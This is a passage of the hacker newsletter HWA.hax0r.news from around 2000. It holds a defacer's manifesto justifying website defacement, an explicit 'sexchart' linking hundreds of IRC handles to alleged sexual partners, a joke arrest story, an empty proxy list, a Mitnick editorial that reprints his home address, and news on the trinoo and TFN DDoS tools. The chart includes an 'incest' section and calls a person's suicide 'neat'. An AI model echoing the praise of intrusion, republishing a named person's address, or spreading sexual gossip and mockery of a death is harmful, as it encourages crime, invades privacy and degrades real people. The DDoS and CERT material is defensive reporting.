About me mailing my hack to attrition. Yes, I did mail the hack to attrition, you know why!? I deface to spread the message out. I personally think if I just deface the site that people won't notice it. So I report it to attrition and they put up a mirror of the site I defaced so other people can view it too. I don't do it for the fame. I could hack under a different name every time, but this is my style. I don't go bragging on IRC "I hacked this..", "I hacked that..". I don't have to prove my skillz to anyone. People can respect me or hate me. I sincerely doubt that defacing a site will make me look better in front of my friends. Almost anyone can find himself a remote exploit and run it against the server. But not anyone can secure a Unix server, program or even make html. For me defacing is just expressing my opinion on stuff, nothing more.

About the 'fuck the ethics' thing. Mr. David, the ethics are here to prevent a major chaos. Without ethics people would just go around and delete anything they run into. I suggest every hacker stick to the ethics as closely as he can, hell, that's why they were written. I know people forget about them, but there are always people like me to remind hackers about the ethics. That's the balance.
People don't stick to them, they leave stupid messages like "I 0wn3 j00". I tell You people, that's bad. Can't You just write something? Anything, just not these stupid irritating messages.

Ok, we started another discussion here. "Who the hell are U to dictate what should be placed on a defaced website?" - You say. Well, You're right. I'm nobody. I can't dictate what should be placed on a defaced website. But I can suggest people not to do it. I just suggested it, I didn't dictate or order it.

"The harder you try to hack the more aware we become as admins." - Aware?! If I deface Your site ten times, and don't tell You how I got in, You become more aware!? I damage Your company for $10,000 by defacing it, because people say: "How can they secure my server when they can't even secure their own." And nobody wants Your service anymore. Don't get me wrong. I'm sure You're a very good and experienced administrator, but nothing is secure enough that hackers can't break it. That's what we devoted Our lives to, penetrating systems.

I enjoy hacking. That is really something unique. People through the ages have always wanted to do something that's forbidden or illegal. Just remind Yourself of Adam & Eve, and the Heaven garden. Eve had to eat that apple although God gave them everything they needed, and just forbade them to eat apples from that tree. Hacking is illegal in many countries. You could get a worse sentence for hacking than for murdering someone. I don't really care if I get raided. Hacking is my crime. A crime of passion. Respect me or hate me, the choice is Yours.

- Peace out, slash -

Shoutouts - p4riah, LogError, zanith, v00d00, PHC, THC, attrition.org, net-security.org, ex1t, sAs72, Cruciphux, HWA.hax0r.news, BHZ, SiRiUs, sLina, kLick_Mi, Emptyhead, mosthated, pr1sm, fuqraq, airWalk, [Princev], zeroeffect, and the whole BLN.

- Peace to my man whitecee, keep Your head up. Peace to everyone who gave support via email or IRC. I wish You a happy and a bug-free New Year.
Links...

- Attrition.org: Keep up the good work fellows
- HelpNet Security: The best news site on the net
- Black Lava Network: BLN for life !!!

Copyright © slash
Penetrating systems since 1998

@HWA

04.0 The hacker sex chart 2000
~~~~~~~~~~~~~~~~~~~~~~~~~

This was to be included in the last issue but attrition was down (the only source I know of that carries it), so here it is in its glory.

*********** WARNING: Explicit content **************************************

slander & libel -- the official computer scene sexchart
"that's none of your business!"
version 9.04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
for updates, additions, or to be put on the sexchart mailing list, mail crank@ice.net. to receive the latest version on efnet irc, "/msg lifelike sexchart".

a link is denoted by any sexual action between computer users that is capable of spreading an std, from wet kissing on up. the last .05 of revisions is listed at the bottom.

since the chart has grown so much, it's been extended in a strange way. to preserve the 78 column width, there is now a secondary chart beneath the first. people whose names appear between asterisks (*) in the first chart also exist in the second.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

[The chart itself, a 78-column ASCII-art link diagram of several hundred IRC handles, did not survive text extraction and is not reproduced here.]
| || || | | | | | | || | | | | luq | || |`--|-|-|-|---------------|---|-----'| dangergrl earle | | | || | | | | | sparxx --- l0ra!@ ----' | | | | | scorpion | || | `-|-|-|---------------'|| || slawz | | WIL WHEAT0N | | | || | | | | dt --'| |`----------|--|--------. | sfuze | || | | | | .--' | .---' oghost mchemist --' | || | | `-|--------------|----|-------|---------------' | | || | | `--------------|--- theejoker zens -- skinflower suiciety | || | | rosieriv -- tfish | | | | | | || | | | | `-----. quagmire | monachus -|-|-- daud | || | | | chlamydiarose | | | | | | || | `------|---. | | nekkidamy polymorf `---. | .'.'| | .-- gheap | Zomba_Soul isis --------|---|------------|-|------|-|-' | | | .--- q | | | | | | | | | acronym | | | syndrome | |.-----' `-. | torquie ------|-- countzero | | | | | | || plexor | | | | | *thepublic* | | | || | | `--|----|--------|-- theora -- RAgent | | | | | || | | ludi dispater | | | rainbow lust!@@# --' | `--------|----|-- dildog -- ladyada .--|-----' | | |||| | | phen bopeep | .-|--|--- *maq* -. | |||| netmask -' .---|------' | | montel --. .-------|-|--|-----' | | | |||`-|--------. | el_jefe ---|-|-------- Heather sami | | .-----|---|-' ||| | | | | | | | | | | .---' | ||| | cal | | Mika tari --|-|-- dan_farmer .-- *pill* | | | vamprella ||| | | | | `-. | | | | .----|--|-|-|---|-------'|`. | Er1s | | val -- shipley -- muffy demonika --|--' | | purpcon | | | | | | | || | | | .-'| |||| .-' .-' | .---|-|-|-' JonM | | karrin --'| | danea mycroft | |||`-|--. | .-|-- kel -|---|-|-' | | | | | | | | ||| | lizzie | .-' | | | | JiJi | | CGD -- jen `-|--- banshee | | ||| | | | | | gh0st --|-|------' | `---------------|------------' | ||| | | sage | `--. .--' `-. shaedow Astaroth | wraith --|--'|| `-|------|----|----|-----.| | | | | | | |`----|------|-- *disorder* wednesday | DangerJen .--- se7en t | `-----|------|----|-|-|---------' | | | | `---. 
| onyx -- furie | | | blaise -- skippy | msk ---' simunye pandora `---|------------|----|-|------------------' ||| michelle ----|----' yt -- panther_modern ||`---------------------------------. .---|---------------. || .--------------------------- fizzgig --|-- rubella | |`----|-------------------------. | | | | | Imperia | deadgirl | | | | | | | | lethar ----------. |.-|--|---|-|---' neologic | Asmodeus | | | | || | | | `---. | | .--' | | | valeriee Mali netik -|-----|-- mayfair | Kalannar | Sinja | | | | | | | | | | | Xaotika StVitus | | | fishie -- Missa | E_D | | | | | | | | | | | outside -- emmie Frobozz | | belial --- Uadjit -- solomon -- Mottyl | | | | | | | | | | |`---. | rebrane | Murmur_gth | | | |.---------|-' Grue --|--|-- moomin13 | | | | | | | ||.--------|-----' | | `--------|------|---------|-- gothbitch! -------|-----------' Fiore --. JelloMold *bifrost* `--. | ||`---------|--------------'| | | `----- aex |`--- pahroza -- anubis MartYr | bile -- turtlgrl --------|----|------' | | | inox Miah secretboy Arkham Stipen - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - hydro311 Starr angieb am0eba -- spyder_bytes thepublic -- rage | | | Chef -- meenk ---- gweeds tigerbeck -- bifrost disorder -- kamira | | | fuz B00bz magpie pinguino -- pill maq -- apok0lyps - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - "the big loop" is over 800 people! holy crap! work for the chart. the top rankings: ---------------- #1 winner -- pinguino & gweeds -- 21 links! it's a tie! #2 winner -- meenk -- 19 links! #3 winner -- crank -- 18 links! #4 winner -- xgirl -- 15 links! #5 winner -- n0elle & sQurl -- 13 links! it's a tie! honorable mention: ----------------- 12 links: gothbitch, ophie, GoNINzo, Wayhigh, & phyzzix! 11 links: murmur, evol, lust, Mikey, & fuz! 10 links: pip, & tigerbeck! 9 links: metalchic, Kaleid, hillary, y-windows, fuz, hitchcock, demonika, & l0ra! be a winner *today*! 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

unconfirmed links: these are links i've been told more than twice to add, but have then been told by others to remove once they're on the chart. each link stays for six months, & if no one can prove it's valid in that time, it is removed & assumed untrue. if you bore witness to one of these links or know someone who did, mail crank@ice.net with your confession!

(no unconfirmed links at this time.)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

notable gross things on the chart: this is a section for easy reference to family members on the chart. the end people are the relation as noted. if you know two people on the big loop are in the same family, mail crank@ice.net & let us rejoice in the incest!

tigerbeck -- aries99                                        1 link:  siblings
spirit -- hillary -- seth -- candyrain                      3 links: siblings
pixy -- gweeds -- jess -- andrew -- mswicked                4 links: siblings
blueeyes -- 8ball -- crank -- aoxomoxoa -- poppie -- donnie 5 links: siblings
art -- seaya -- kaia -- murmur -- sonia -- plexus           5 links: siblings
potter -- scat -- bF -- evol -- styx                        4 links: cousins
christy -- kkrazy -- kinessa -- gweeds -- LCN -- tanadept   5 links: stepsiblings

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

#2600:
lashtal | empress deadguy | maverick | | | | sin ----- speck -- liquid_motion | | beastly -- c4in d_rebel kspiff -- mimes -- dieznyik -- nelli | borys -- zebby (#bodyart)
LdyMuriel Erato flutterbi chexbitz `---. | .---' | Kalika -- IceHeart -------------- virago -- mre || | | | Berdiene --'| | Pyra -- Roamer ewheat | `---------.
Serenla --' roach -- satsuki -- spinningmind kitiara -- starlord anarchy -- aphex twin soul seeker -- educated guess tempus thales -- lady in black -- midnight sorrow magnatop -- darice jandor -- alexis ryna illusionx -- thumper javaman -- nrmlgrl

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

bodyart [#bodyart/#bodypiercing/#tattoo]:
ga[r]y | | xindjoo -- grrtigger -- bone-head | | FreAkBoi -- psychoslut -- timo heidikins -- pasquale grub -- gypsie tabaqui -- catbones -- sprite ministry -- SuperMia -- superdave bert37 -- chiot steppah -- creeper syx66 -- gypsy_whore

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

#coders:
simon -- wolfie -- raphael (#trax) bolt -- ashli

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

#ezines:
sirlance -- holly -- hardcore | rattle -- s4ra -- doommaker phairgirl -- M4D_3LF -- amanda -- unrelated -- effy -- BigDaddyBill | | pixieOpower spiff -- tl109 figglemuffinz -- creed ilsundal -- fairy_princess vanir -- darkland snarfblat -- d1d1 dimes -- bexy -- mindcrime tut -- casey pezmonkey -- cptbovine greyhawk -- crazybaby cheesus -- meowkovich catbutt -- pulse ygraine -- drool bigmike -- shana camel -- icee UberFizzGig -- kniht -- wadsworth

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

#hack:
t0c -- seussy -- o0 | taner glyph -- adnama -- weaselboy -- vein -- montell | | m0rticia shamrock -- jennicide -- efpee -- imposter-dh | bellum radikahl -- jazmine -- gitm t3kg -- elfgard pluvius -- lydia panic -- plant -- erikt sl33p -- molldoll allman -- costales rhost -- sue_white serpent -- no_ana vaxbuster -- tiggie -- redragon ajrez -- luminare -- m0jo

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

#mindvox:
killarney -- tomwhore -- fairosa -- kids

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

misc:
MsLePew -- Beacher sangfroid -- inspektor foo -- leeny HippieEB -- Imaj
mskathy -- strahd plutonium -- pixiedust cnelson -- vanessa Hawkerly --- MeaNKaT --- Morpheus Vega1 -- Serena DIPTY_DO -- Trish_ -- hellsnake Grace^ -- Gusto -- puckie notyou -- jennyh Skada -- icee_bin -- eriss doogie -- sarahlove kirby-wan -- cybergirl lurid -- deb -- bmbr j-dog -- a_kitten Fenchurch -- Becca captain_zap -- ms_infowar jaran -- duke chs -- princess ndex -- illusions

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

music [#punk/#ska/#sxe]:
solaris -- kojak -- chelsea -- pieskin -- lady rude | kcskin -- janew | kamaskin -- kimee -- dano joojoo nes | | auralee -- konfuz -- subgurl -- danx -- starla | | kathy21 alee mutata -- skidman shellskin -- amberskin astrophil -- maggiemae skarjerk -- pancreas prick -- taxie -- jubjub

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

#seattle:
nitefall bgh -- superlime -- Shill -- Lizsac fimble | | | juice -- e1mo -- shane -- aeriona -- Justnsane -- koosh -- tcb clarita -- dataangel wyclef -- NessaLee Drmc -- Jill- SisSoul -- Matt Dawgie -- Jenay jsk -- ames Liz -- jkowall kurgan -- babygrrl Mcbeth -- BeccaBoo djinn -- ruthe wankle -- carrianne hamilton -- nurit

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

#skate:
kindje -- tigerkat -- huphtur -- superzan | punkgirl -- yakuza -- maryjane | caroline -- rhy cosmo cks lodias `---. | .--' outlander -- spike -- lightborn .--'|||`--.
darkelf ||| weevil ||| tenchi --'|`-- h0ly [r] katskate -- earwax vlinder -- miesj superfly -- conchita -- nobaboon -- no_fievel p4nacea -- bakunin herculez -- nicki

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

#trax:
cardiac sandman -- trissy skie -- necros | | | saxy -- vegas basehead | | | kiwidog fassassin -- discodiva gblues | squeep -- qporucpine -- ami -- dilvish higherbeing -- ms_saigon -- floss | | howler vizz mellow-d -- kisu -- snowman -- trixi | megz lowrider -- lum -- perisoft mickrip -- astrid -- draggy -- leece pandorra -- malakai ozone -- bliss animix -- pixie lummy -- daedalus frostbitten_dream -- pickl'ette -- redial

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

#twilight_zone:
revneptho dtm Frizz0 Wireless `----.| .---' | h0lydirt --- nina -- zbrightmn -- halah .--'| `---. | dog3 | whistler RockShox | chilly joeN -- daysee -- evil_ed -- linnea | munchie Loverman -- Missi redbird -- reddy

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

#unix:
in4mer -- devilgrl gerg -- tyger chloe -- cosmos dem -- webb callechan -- rhiannon RealScott -- Ila supertaz -- skye

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

revision history -- last updated 7-28-99

v9.04:
added belial, f_fisher, Murmur_gth, bix, DJTrax, kamira, Heather, phen, montel, monachus, Schquimpy, Nex, phreaky, Sylvie, Katia, banshee, PointBlank, & RaggedyAnne.
added magpie, hydro311, kamira, disorder, apok0lyps, maq, rage, & thepublic to the secondary chart.
(if anyone has an alternate nick for the #gothic Murmur, please mail me. i used the nick Murmur_gth for now.)
added misc gh0st group to the big loop.
gweeds moves up to winner 1.
meenk moves up to winner 2.
gothbitch moves up to honorable mention 12.
renamed Listener to alecks.
renamed illuminaeti to luminare.
renamed zines category to #ezines.
added phairgirl -- pixieOpower -- M4D_3LF -- amanda to #ezines.
added amanda -- unrelated -- effy -- BigDaddyBill to #ezines.
added jennicide -- bellum to #hack.
added luminare -- ajrez to #hack.
added to misc:
  deb -- bmbr
  j-dog -- a_kitten
  Fenchurch -- Becca
  captain_zap -- ms_infowar
  deb -- lurid
  jaran -- duke
  chs -- princess
  ndex -- illusions
removed one outdated "unconfirmed link".
removed miasma -- six from unconfirmed. oops.
removed bogus links:
  t -- gf -- lilfeet
  Quarex -- keroppi
new links:
  fizzgig -- (solomon, Asmodeus, fishie, belial)
  Grue -- gothbitch -- Asmodeus
  gothbitch -- belial -- Uadjit
  METchiCK -- (f_fisher, grimmy, deadapril, supervixn)
  kel -- (disorder, lizzie, gh0st)
  corp -- gweeds -- magpie
  aex -- Murmur_gth
  eppie -- bix
  styx -- DJTrax
  meenk -- hydro311
  halfman -- sumogirl
  disorder -- kamira -- apok0lyps -- maq -- Heather -- montel
  el_jefe -- (Mika, phen, Heather)
  daud -- monachus
  amos -- velcro
  Schquimpy -- (trilobyte, EddieV, Nex)
  splat -- phreaky
  Sylvie -- neko -- Katia
  shipley -- banshee
  thepublic -- rage
  hylonome -- PointBlank -- RaggedyAnne
  hylonome -- RaggedyAnne -- Quarex

v9.03:
added deadgirl, Gemni, DrMonk, AK47, monkeygrl, Miah, grlfrmars, wildcard, spectacle, kev-man, bile, chinagirl, rubella, Arkham, Uadjit, fishie, solomon, moomin13, Grue, Missa, Mottyl, Kalannar, E_D, Fiore, MartYr, & Stipen.
added angieb to the secondary chart.
updated number of people in the big loop.
gweeds moves up to winner 2.
meenk moves up to winner 3.
gothbitch moves up to honorable mention 9.
added miasma -- six to unconfirmed.
added zines The_Sock group to the big loop.
added zines AnonGirl group to the big loop.
added javaman -- nrmlgrl to #2600.
added satsuki -- (IceHeart, roach, spinningmind) to #2600.
added doogie -- sarahlove to misc.
added kirby-wan -- cybergirl to misc.
added shane -- aeriona to #seattle.
added to #trax:
  skie -- necros
  astrid -- draggy
  ms_saigon -- vizz
  snowman -- megz
removed bogus links:
  mailart -- konfuz (mailart = nes)
new links:
  DH -- Gemni -- DrMonk
  meenk -- AK47
  gweeds -- angieb
  AIDS -- caitlin
  deadgirl -- Mali -- maq
  logicbox -- monkeygrl
  Fiore -- gothbitch -- Miah
  grlfrmars -- (mogel, wildcard, spectacle, kev-man)
  turtlegrl -- bile
  trilobyte -- chinagirl
  fizzgig -- rubella
  anubis -- Arkham
  swisspope -- AnonGirl
  pahroza -- Uadjit -- solomon -- moomin13 -- Grue
  Fiore -- solomon -- gothbitch -- Uadjit -- fishie -- Missa
  Mottyl -- (solomon, Kalannar, E_D)
  MartYr -- Fiore -- Stipen

v9.02:
added rebrane, Xaotika, valeriee, JelloMold, neologic, amos, EddieV, Roadruner, TAYL0R HAWKINS, MINNIE DRIVER, secretboy, kel, nevre, freqout, krnl, skatin, Sinja, Frobozz, & hawk.
gweeds moves up to winner 2.
meenk moves up to winner 3.
sQurl moves up to winner 6.
metalchic moves up to honorable mention 9.
renamed cannianne to carrianne.
added to misc:
  Hawkerly --- MeaNKaT --- Morpheus
  Vega1 -- Serena
  DIPTY_DO -- Trish_ -- hellsnake
  Grace^ -- Gusto -- puckie
  notyou -- jennyh
  Skada -- icee_bin -- eriss
  (special note: eriss was dumped for Skada & subsequently leapt to her death from a nineteenth story window. neat!)
added to #zines:
  nico -- anjee -- meethos -- METchiCK -- The_Sock -- ^mindy^
  meethos -- Alucard -- The_Sock -- kitn -- ILUVJeNNA
  MrJuGGaLo -- METchiCK -- facedown
  caitlin --- wmmr --- coffeegrl
  AnonGirl -- Medusa -- PrimeX -- Juliette
removed bogus links:
  emmie -- (netik, msk, Herodotus)
  billn -- Tay -- retrospek
  mayfair -- outside
  Mali -- (Asmodeus, pahroza, Uhlume, Imperia)
new links:
  emmie -- rebrane -- JelloMold
  Xaotika -- lethar -- valeriee
  mayfair -- neologic
  trilobyte -- amos -- EddieV -- sonia
  sQurl -- Roadruner
  Tay -- TAYL0R HAWKINS -- MINNIE DRIVER
  anubis -- secretboy
  netmask -- kel
  meenk -- nevre
  gweeds -- freqout
  missx -- krnl
  metalchic -- skatin
  Imperia -- Asmodeus -- Sinja
  turtlgrl -- pahroza -- gothbitch -- Mali -- lethar
  fizzgig -- msk
  gothbitch -- Frobozz
  darwin -- hawk

v9.01:
added tamago, atticus, lilindian, martyn, aries99, ryshask, timmerca, twichykat, soulvamp, mysl, fizzgig, lethar, anubis, & inox.
added tigerbeck & bifrost to the secondary chart.
updated number of people in the big loop.
new "gross link": tigerbeck -- aries99 (1: siblings)
gweeds moves up to winner 3.
tigerbeck moves up to honorable mention 10.
added FreAkBoi -- psychoslut -- timo to #bodyart.
added supertaz -- skye to #unix.
removed one outdated "unconfirmed link".
removed bogus links:
  juliet -- readwerd
  FreAkBoi -- ga[r]y (#bodyart)
  Briana -- homeysan
new links:
  seaya -- tamago
  _Melody_ -- atticus
  DrkSphere -- lilindian
  tigerbeck -- (aries99, martyn, ryshask, timmerca, soulvamp)
  tigerbeck -- (allira, twichykat, spacegirl, bifrost)
  gweeds -- mysl
  msk -- DangerJen -- Astaroth
  outside -- mayfair
  netik -- fizzgig
  emmie -- lethar
  pahroza -- anubis
  aex -- inox

v9.00:
i was going to do something special for 9.00, but there just isn't anything to do. would you people be interested in sexchart tshirts? mail crank@ice.net.
note to webmasters - it's not sexchart.8 anymore - sexchart.txt. be sure to update your links.
added NeuralizR, vlaad, pahroza, Imperia, Mali, Uhlume, StVitus, Herodotus, & Asmodeus.
added am0eba, & spyder_bytes to the secondary chart.
added netik & Mali sections to the big loop.
added new section: #seattle.
moved e1mo links to #seattle.
moved koosh -- tcb to #seattle.
moved clarita -- dataangel to #seattle.
added chexbitz -- virago -- ewheat to #2600.
added Astaroth -- DangerJen to #gothic.
added plutonium -- pixiedust to misc.
added cnelson -- vanessa to misc.
added to #seattle:
  wyclef -- NessaLee
  Drmc -- Jill-
  SisSoul -- Matt
  Dawgie -- Jenay
  jsk -- ames
  Liz -- jkowall
  bgh -- superlime -- Shill -- Lizsac
  fimble -- koosh -- Justnsane -- aeriona -- superlime
  kurgan -- babygrrl
  Mcbeth -- BeccaBoo
  djinn -- ruthe
  wankle -- cannianne
  hamilton -- nurit
added halah -- Wireless to #twilight_zone.
removed one outdated "unconfirmed link".
removed bogus links:
  e1mo -- chris22 (#seattle)
  loki -- am0eba -- sledge
  missx -- (sledge, erikb, ice9)
  Briana -- nebulizr
  logicbox -- skully
  murcurochrome -- jazmine -- deadkat (#hack)
new links:
  am0eba -- spyder_bytes
  Briana -- (NeuralizR, bumble, nettwerk, homeysan, tsal)
  teletype -- vlaad
  netik -- msk -- emmie -- outside
  aex -- bifrost -- emmie -- netik
  emmie -- Herodotus
  bifrost -- turtlgrl
  Imperia -- msk
  Mali -- (Uhlume, Imperia, Asmodeus, StVitus, pahroza)

@HWA

05.0 Peer finally arrested after over a decade of connection resetting
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.ircnews.com/

(Humour, in case you didn't know: a common connection error is "connection reset by peer", caused by errors in the network and on occasion a DoS attack on your IRC connection... ;) - Ed)

Peer Arrested, Charged With Resetting Connections

SEATTLE, WA - An exhaustive eight month cyberhunt ended shortly before dawn on January 14th, 2000, as FBI agents and Washington State Troopers apprehended the elusive chatroom terrorist known only as Peer.
The IRC menace was brought to justice after a decade-long connection resetting spree that plagued chatters around the globe. FBI officials said the number of reset connections numbered in the "millions". Connections being reset by peer were the number one cause of interrupted chat sessions on all major IRC networks in 1999.

Undernet ChanServ Committee member Morrissey told IRCNews.com, "What set peer apart was the element of surprise. With ping, you kinda knew you were gonna time out. You could tell. Peer totally got you out of nowhere."

Leland, another bigshot on the Undernet IRC network, praised the FBI for their work, "How many idle times must be ruined? How many cybersex sessions must be cut short before we put an end to Peer and his shinanigans?"

Peer's lawyers criticized Leland's use of the word "shinanigans". Peer's lead defence attorney responded, "Really, I think we can come up with a better term than that. We're all adults here. Besides, it's 'alleged' shinanigans."

Federal Prosecutor Sarah Evans told IRCNews.com she intends to "throw the book" at Peer. If convicted on all counts, Peer could spend up to the next three years on probation. "His ass is mine," claimed a motivated Evans. "With any luck, we'll get that judge who handled the Mitnick case."
@HWA

06.0 Updated proxies list from IRC4all
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.lightspeed.de/irc4all/

Socks 4 proxies:
~~~~~~~~~~~~~~~~

Socks 5 proxies
~~~~~~~~~~~~~~~

Wingates
~~~~~~~~

Other proxies available, check the site for more/updated lists.

@HWA

07.0 Rant: Mitnick to go wireless?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Editorial, by Cruciphux Jan 23rd 2000

Finally the long awaited release of ueber hacker Kevin Mitnick has arrived, he was released Friday Jan.
21st in the morning and is not allowed to touch computers or cellular phones for a period of three years without the express permission of his probation officer. Kevin holds out one hope though: earlier in his 'career' Kevin was an avid amateur radio operator, and his license recently expired; he is reportedly scrambling to obtain a new one. This poses some very interesting questions: will he be allowed to operate his HAM equipment?

Packet Radio

For those not in the know, myself and several HWA members are also HAM operators; most of us got hooked by the prospect of a technology called "packet radio". The internet runs on a protocol known as X.25; packet radio uses a similar methodology known as AX.25, the "A" denoting "A"mateur. We're some of the few people that have actually IRC'ed using a packet radio link to a unix server over the 2m band, but of course this requires a computer and additional computer equipment hooked to the radio gear necessary to run packet. Let's forget all that, since owning a computer is out of Kevin's reach at this time, and look at what other 'trouble' he can get into.

Repeater Nets and the Autopatch

The radios of choice these days among young hams are dual band HTs (short for handy-talky or 'walkie-talkie'); these will usually cover the 2m band and the 440 cm bands. The 2m band by itself is the most common band in use and operates a great deal using repeaters. A repeater can be compared to a cell site insomuch as it takes a weak signal (the HT, generally 100mw to 4 watts in power, much like small cell phones) and REPEATS or re-broadcasts it on another (close) frequency as a stronger signal, thus reaching greater range. With special DTMF codes it is possible to LINK repeaters and talk across the country using repeater nets. What's so great about this? Apart from the obvious ability to talk to people long distances for little to no cost, many repeaters have the magic box known as an AUTOPATCH.
The autopatch is a computer interface at the repeater site that interfaces your radio signals with a TELCO line. (aha!) Yes, many hams enjoy the privileges (minus obvious privacy and anonymity) of 'cellular' or 'radio phone' usage for minimal cost. For a GOOD radio you are looking at an investment of around $500, and for a HAM club membership (to get all the repeater and autopatch codes etc) you're looking at around $15/year, or you can find the codes posted in many places on the web.

Caveats / privacy

The airwaves are 'public property' and as such are regulated (for our own good of course) by big brother, that being the FCC in the U.S.A or the DOC in Canada. When you pass your licensing test (minimal proficiency in electronics and general radio theory must be demonstrated via a written test) you will be assigned a unique CALL SIGN (in some places you can request a custom/vanity sequence, but you will be allocated a random unused call if your request is already in use). Since the airwaves are public property, so are the records of those users licensed to broadcast on them. Several online databases exist, or can be purchased cheaply on CDROM, with many search features like search by name, call, address, partials etc... In this case a simple search on the QRZ website (http://www.qrz.com/) in the OLD database for "Kevin Mitnick" returns several possible matches, among them the correct one, which is listed below.

--------------------------------------------------------------------------
Callbook Data for N6NHG

The following information is taken from the March 1993 QRZ Ham Radio Callsign Database. This is not the current information for this callsign. Click on the underlined callsign to see the latest information for this record.
Callsign:   N6NHG
Class:      General
Name:       KEVIN D MITNICK
Effective:  12 Dec 1989
Expires:    12 Dec 1999
Address:    14744 LEADWELL ST
City/State: VAN NUYS CA 91405
--------------------------------------------------------------------------

We can safely assume this is correct since the initials (KDM) are right and the location matches up, along with the license renewal date of 12/12/99.

Shenanigans
~~~~~~~~~~~

How does Kevin fit into all this? Well, as you can see, it is possible to interface the radio with computer equipment and also manipulate outside phone lines using ham radios. A recurring problem in these parts were pirate operators making bogus 911 calls using the local CN Tower's (then public or 'open') autopatch - it now requires a code and subaudible PL tone - which actually closed down the repeater site for some time and caused unknown harassing traffic to the 911 operators fielding the bogus calls. The pirate is not totally safe however: much like Kevin was apprehended by Tsutomu through lax use of his cellphone and some radio direction finding (RDF) gear, so can the 2m pirate be tracked through RDF triangulation. Several grass roots groups do nothing but track down pirate signals or, sometimes for competition, randomly placed signals, in what is known as the 'Fox Hunt'. But this requires lots of manpower and the willingness to get out there and help do some tracking.

Epilogue
~~~~~~~~

I truly hope Kevin is allowed to get back into one of his lifetime loves, but he may find that there are too many caveats with new features and computer integration into the repeater systems; mailboxes and the like are commonplace on repeaters, and so are email gateways, so it is conceivable that one could inadvertently get into trouble through the grey lines of technology.... Meanwhile, all the best to Kevin and his family, and hopefully you learned a little bit about amateur radio's offerings along the way, peace out.

Cruciphux
cruciphux@dok.org
Editor HWA.hax0r.news newsletter.
http://welcome.to/HWA.hax0r.news/

Further reading:

http://www.arrl.org - The main site of the American Radio Relay League
http://www.qrz.com/ - If you know the callsign of the operator his docs are published publicly in a database which can be searched online here. Also contains other info and links.
http://www.freekevin.com/ - You know, like more info than you need on KDM.

@HWA

08.0 Distributed Attacks on the rise. TFN and Trinoo.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

CMP Techweb : http://www.techweb.com/wire/story/TWB19991130S0010

Intruders Get Under A Network's Skin
(11/30/99, 5:40 p.m. ET)
By Rutrell Yasin, InternetWeek

A rise in rogue distributed denial of service tools being installed on networks by intruders has prompted the Computer Emergency Response Team (CERT) Coordination Center to help companies thwart the large coordinated packet flooding attacks.

CERT, a watchguard organization, has issued an advisory on two tools--trinoo and Tribe Flood Network (TFN)--after receiving reports from organizations affected by the tools. The tools "appear to be undergoing active development, testing, and deployment on the Internet," according to a CERT incident note.

So far, the tools have been installed on thousands of servers or workstations in about 100 enterprise sites, said Kevin Houle, CERT's incident response team leader.

While the type of packet flooding attacks the tools generate are not new, the scope of the attacks can have a devastating impact on an enterprise network, industry experts and IT managers agreed.

Both trinoo and TFN enable an intruder to launch coordinated attacks from many sources against one or more targets. In essence, the tools use bandwidth from multiple systems on diverse networks to generate potent attacks. The tools "can generate very large denial of service attacks that consume as much as one gigabyte of data per second," said Houle.
To put that in perspective: Rather than using one BB gun to hit a target, a hacker now has the equivalent of 1,000 BB guns, Houle said. Or the effects can be more like a shotgun, said Mike Hagger, vice president of security at Oppenheimer Funds. These tools can "be deadly and can bring a company to its knees in a matter of seconds," Hagger said.

These rogue distributed tools are usually installed on host servers that have been compromised by exploiting known security holes, such as various Remote Procedural Call vulnerabilities, according to CERT.

Trinoo is used to launch coordinated UDP flood attacks from many sources. A trinoo network consists of a small number of servers and a large number of clients. To initiate an attack, an intruder connects to a trinoo server and instructs it to launch an attack against one or more IP addresses. The trinoo server then communicates with the clients, giving them instructions to attack one or more IP addresses for a specified period of time, CERT said.

In addition to UDP flood attacks, TFN can generate TCP SYN flood, ICMP echo request flood, and ICMP directed broadcasts or smurf attacks. The tool can generate packets with spoofed source IP addresses. To launch an attack with TFN, an intruder instructs a client or server program to send attack instructions to a list of TFN servers or clients.

In its alert, CERT has issued a number of steps IT managers can take to thwart distributed denial of service attacks. To prevent installation of distributed attack tools on networked systems, users should stay up to date with security patches to operating systems and applications software. IT managers should also continuously monitor their networks for signatures of distributed attack tools. For example, if a company uses intrusion detection systems, IT should tune them to recognize signs of trinoo or TFN activity.
Since a site under attack may be unable to communicate via the Internet during an attack, security policies should include "out of the band communications with upstream network operators or emergency response teams," CERT advised.

@HWA

CERT Advisory: http://www.cert.org/incident_notes/IN-99-07.html

CERT® Incident Note IN-99-07

The CERT Coordination Center publishes incident notes to provide information about incidents to the Internet community.

Distributed Denial of Service Tools

Updated: December 8, 1999 (added DSIT Workshop paper and IN-99-05)
Thursday, November 18, 1999

Overview

